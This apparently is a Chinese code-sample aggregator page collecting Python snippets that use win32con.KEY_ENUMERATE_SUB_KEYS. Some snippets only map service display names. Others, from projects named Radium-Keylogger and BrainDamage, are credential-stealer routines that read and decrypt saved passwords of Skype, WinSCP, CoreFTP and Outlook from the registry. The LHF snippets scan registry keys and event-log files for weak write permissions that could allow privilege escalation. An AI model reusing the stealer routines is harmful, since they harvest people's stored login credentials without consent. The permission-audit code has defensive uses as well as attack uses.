Python win32con 模块,KEY_ENUMERATE_SUB_KEYS 实例源码

我们从Python开源项目中,提取了以下19个代码示例,用于说明如何使用win32con.KEY_ENUMERATE_SUB_KEYS

项目:purelove    作者:hucmosin    | 项目源码 | 文件源码
def _GetServiceShortName(longName):
    # looks up a services name
    # from the display name
    # Thanks to Andy McKay for this code.
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    num = win32api.RegQueryInfoKey(hkey)[0]
    longName = longName.lower()
    # loop through number of subkeys
    for x in range(0, num):
    # find service name, open subkey
        svc = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, svc, 0, access)
        try:
            # find display name
            thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            if thisName.lower() == longName:
                return svc
        except win32api.error:
            # in case there is no key called DisplayName
            pass
    return None

# Open a service given either it's long or short name.
项目:remoteControlPPT    作者:htwenning    | 项目源码 | 文件源码
def _GetServiceShortName(longName):
    # looks up a services name
    # from the display name
    # Thanks to Andy McKay for this code.
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    num = win32api.RegQueryInfoKey(hkey)[0]
    longName = longName.lower()
    # loop through number of subkeys
    for x in range(0, num):
    # find service name, open subkey
        svc = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, svc, 0, access)
        try:
            # find display name
            thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            if thisName.lower() == longName:
                return svc
        except win32api.error:
            # in case there is no key called DisplayName
            pass
    return None

# Open a service given either it's long or short name.
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def get_regkey(self):
        try:
            accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
            keyPath = 'Software\\Skype\\ProtectedStorage'

            try:
                hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
            except Exception, e:
                print e
                return ''

            num = win32api.RegQueryInfoKey(hkey)[1]
            k = win32api.RegEnumValue(hkey, 0)

            if k:
                key = k[1]
                return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
        except Exception, e:
            print e
            return 'failed'

    # get hash from configuration file
项目:CodeReader    作者:jasonrbr    | 项目源码 | 文件源码
def _GetServiceShortName(longName):
    # looks up a services name
    # from the display name
    # Thanks to Andy McKay for this code.
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    num = win32api.RegQueryInfoKey(hkey)[0]
    longName = longName.lower()
    # loop through number of subkeys
    for x in range(0, num):
    # find service name, open subkey
        svc = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, svc, 0, access)
        try:
            # find display name
            thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
            if thisName.lower() == longName:
                return svc
        except win32api.error:
            # in case there is no key called DisplayName
            pass
    return None

# Open a service given either it's long or short name.
项目:LHF    作者:blindfuzzy    | 项目源码 | 文件源码
def check_registry():
    for key_string in reg_paths:
        parts = key_string.split("\\")
        hive = parts[0]
        key_string = "\\".join(parts[1:])
        try:
            keyh = win32api.RegOpenKeyEx(getattr(win32con, hive), key_string, 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
        except:
            #print "Can't open: " + hive + "\\" + key_string
            continue

        sd = win32api.RegGetKeySecurity(keyh, win32security.DACL_SECURITY_INFORMATION | win32security.OWNER_SECURITY_INFORMATION)
        weak_perms = check_weak_write_perms_by_sd(hive + "\\" + key_string, 'reg', sd)
        if weak_perms:
            vprint(hive + "\\" + key_string)
            #print weak_perms
            if verbose == 0:
                sys.stdout.write(".")
            save_issue("WPC003", "writable_reg_paths", weak_perms)
            # print_weak_perms("x", weak_perms)
    print

# TODO save_issue("WPC009", "writable_eventlog_key", weak_perms)  # weak perms on event log reg key
项目:LHF    作者:blindfuzzy    | 项目源码 | 文件源码
def get_user_paths():
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
    except:
        return 0
    paths = []
    subkeys = win32api.RegEnumKeyEx(keyh)
    for subkey in subkeys:
        try:
            subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] + "\\Environment" , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
        except:
            pass
        else:
            subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)

            try:
                path, type = win32api.RegQueryValueEx(subkeyh, "PATH")
                paths.append((subkey[0], path))
            except:
                pass
    return paths
项目:LHF    作者:blindfuzzy    | 项目源码 | 文件源码
def get_system_path():
    # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
    key_string = 'SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, key_string , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
    except:
        return None

    try:
        path, type = win32api.RegQueryValueEx(keyh, "PATH")
        return path
    except:
        return None

#name=sys.argv[1]
#if not os.path.exists(name):
    #print name, "does not exist!"
    #sys.exit()
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def get_regkey(self):
        try:
            accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
            keyPath = 'Software\\Skype\\ProtectedStorage'

            try:
                hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
            except Exception, e:
                # print e
                return ''

            num = win32api.RegQueryInfoKey(hkey)[1]
            k = win32api.RegEnumValue(hkey, 0)

            if k:
                key = k[1]
                return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
        except Exception, e:
            # print e
            return 'failed'

    # get hash from configuration file
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def check_winscp_installed(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,
                                      'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
            return True
        except Exception, e:
            return False
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def check_masterPassword(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security',
                                  0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'UseMasterPassword')[0])

        if thisName == '0':
            return False
        else:
            return True
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def get_key_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
        except Exception, e:
            return False

        num_profiles = win32api.RegQueryInfoKey(key)[0]
        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)

            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            num = win32api.RegQueryInfoKey(skey)[1]

            values = {}
            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)
                if k[0] == 'Host':
                    values['Host'] = k[1]
                if k[0] == 'Port':
                    values['Port'] = k[1]
                if k[0] == 'User':
                    values['User'] = k[1]
                    pwdFound.append(values)
                if k[0] == 'PW':
                    try:
                        values['Password'] = self.decrypt(k[1])
                    except Exception, e:
                        values['Password'] = 'N/A'
        # print the results
        return pwdFound
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def run(self):

        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return

        num = win32api.RegQueryInfoKey(hkey)[0]
        pwdFound = []
        for x in range(0, num):
            name = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

            num_skey = win32api.RegQueryInfoKey(skey)[0]
            if num_skey != 0:
                for y in range(0, num_skey):
                    name_skey = win32api.RegEnumKey(skey, y)
                    sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                    num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                    for z in range(0, num_sskey):
                        k = win32api.RegEnumValue(sskey, z)
                        if 'password' in k[0].lower():
                            values = self.retrieve_info(sskey, name_skey)
                            # write credentials into a text file
                            if len(values) != 0:
                                pwdFound.append(values)

        # print the results
        return pwdFound
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def check_winscp_installed(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,
                                      'Software\Martin Prikryl\WinSCP 2\Configuration\Security', 0, accessRead)
            return True
        except Exception, e:
            return False
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def check_masterPassword(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Configuration\Security',
                                  0, accessRead)
        thisName = str(win32api.RegQueryValueEx(key, 'UseMasterPassword')[0])

        if thisName == '0':
            return False
        else:
            return True
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def get_logins_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
                                      accessRead)
        except Exception, e:
            return False

        num_profiles = win32api.RegQueryInfoKey(key)[0]

        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)

            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            num = win32api.RegQueryInfoKey(skey)[1]

            port = ''
            values = {}

            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)

                if k[0] == 'HostName':
                    self.set_hostname(k[1])

                if k[0] == 'UserName':
                    self.set_username(k[1])

                if k[0] == 'Password':
                    self.set_hash(k[1])

                if k[0] == 'PortNumber':
                    port = str(k[1])

            if num != 0:
                if port == '':
                    port = '22'
                try:
                    password = self.decrypt_password()
                    values['Password'] = password
                except Exception, e:
                    pass

                values['Hostname'] = self.get_hostname()
                values['Port'] = port
                values['Username'] = self.get_username()

                pwdFound.append(values)

        # print the results
        return pwdFound
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def get_key_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
        except Exception, e:
            return False

        num_profiles = win32api.RegQueryInfoKey(key)[0]
        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)

            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            num = win32api.RegQueryInfoKey(skey)[1]

            values = {}
            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)
                if k[0] == 'Host':
                    values['Host'] = k[1]
                if k[0] == 'Port':
                    values['Port'] = k[1]
                if k[0] == 'User':
                    values['User'] = k[1]
                    pwdFound.append(values)
                if k[0] == 'PW':
                    try:
                        values['Password'] = self.decrypt(k[1])
                    except Exception, e:
                        values['Password'] = 'N/A'
        # print the results
        return pwdFound
项目:BrainDamage    作者:mehulj94    | 项目源码 | 文件源码
def run(self):

        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            return

        num = win32api.RegQueryInfoKey(hkey)[0]
        pwdFound = []
        for x in range(0, num):
            name = win32api.RegEnumKey(hkey, x)
            skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

            num_skey = win32api.RegQueryInfoKey(skey)[0]
            if num_skey != 0:
                for y in range(0, num_skey):
                    name_skey = win32api.RegEnumKey(skey, y)
                    sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                    num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                    for z in range(0, num_sskey):
                        k = win32api.RegEnumValue(sskey, z)
                        if 'password' in k[0].lower():
                            values = self.retrieve_info(sskey, name_skey)
                            # write credentials into a text file
                            if len(values) != 0:
                                pwdFound.append(values)

        # print the results
        return pwdFound
项目:Radium-Keylogger    作者:mehulj94    | 项目源码 | 文件源码
def get_logins_info(self):
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        try:
            key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
                                      accessRead)
        except Exception, e:
            return False

        num_profiles = win32api.RegQueryInfoKey(key)[0]

        pwdFound = []
        for n in range(num_profiles):
            name_skey = win32api.RegEnumKey(key, n)

            skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
            num = win32api.RegQueryInfoKey(skey)[1]

            port = ''
            values = {}

            for nn in range(num):
                k = win32api.RegEnumValue(skey, nn)

                if k[0] == 'HostName':
                    self.set_hostname(k[1])

                if k[0] == 'UserName':
                    self.set_username(k[1])

                if k[0] == 'Password':
                    self.set_hash(k[1])

                if k[0] == 'PortNumber':
                    port = str(k[1])

            if num != 0:
                if port == '':
                    port = '22'
                try:
                    password = self.decrypt_password()
                    values['Password'] = password
                except Exception, e:
                    pass

                values['Hostname'] = self.get_hostname()
                values['Port'] = port
                values['Username'] = self.get_username()

                pwdFound.append(values)

        # print the results
        return pwdFound
项目:LHF    作者:blindfuzzy    | 项目源码 | 文件源码
def check_event_logs():
    key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
    except:
        print "Can't open: " + key_string
        return 0

    subkeys = win32api.RegEnumKeyEx(keyh)
    for subkey in subkeys:
        # print key_string + "\\" + subkey[0]
        sys.stdout.write(".")
        try:
            subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0] , 0, win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ)
        except:
            print "Can't open: " + key_string
        else:
            subkey_count, value_count, mod_time = win32api.RegQueryInfoKey(subkeyh)
            # print "\tChild Nodes: %s subkeys, %s values" % (subkey_count, value_count)

            try:
                filename, type = win32api.RegQueryValueEx(subkeyh, "DisplayNameFile")
            except:
                pass
            else:
                weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
                if weak_perms:
                    # print "------------------------------------------------"
                    # print "Weak permissions found on event log display DLL:"
                    # print_weak_perms("File", weak_perms)
                    sys.stdout.write("!")
                    save_issue("WPC008", "writable_eventlog_dll", weak_perms)

            try:
                filename, type = win32api.RegQueryValueEx(subkeyh, "File")
            except:
                pass
            else:
                weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
                if weak_perms:
                    # print "------------------------------------------------"
                    # print "Weak permissions found on event log file:"
                    # print_weak_perms("File", weak_perms)
                    sys.stdout.write("!")
                    save_issue("WPC007", "writable_eventlog_file", weak_perms)
    print
        #sd = win32api.RegGetKeySecurity(subkeyh, win32security.DACL_SECURITY_INFORMATION) # TODO: get owner too?
        #print "\tDACL: " + win32security.ConvertSecurityDescriptorToStringSecurityDescriptor(sd, win32security.SDDL_REVISION_1, win32security.DACL_SECURITY_INFORMATION)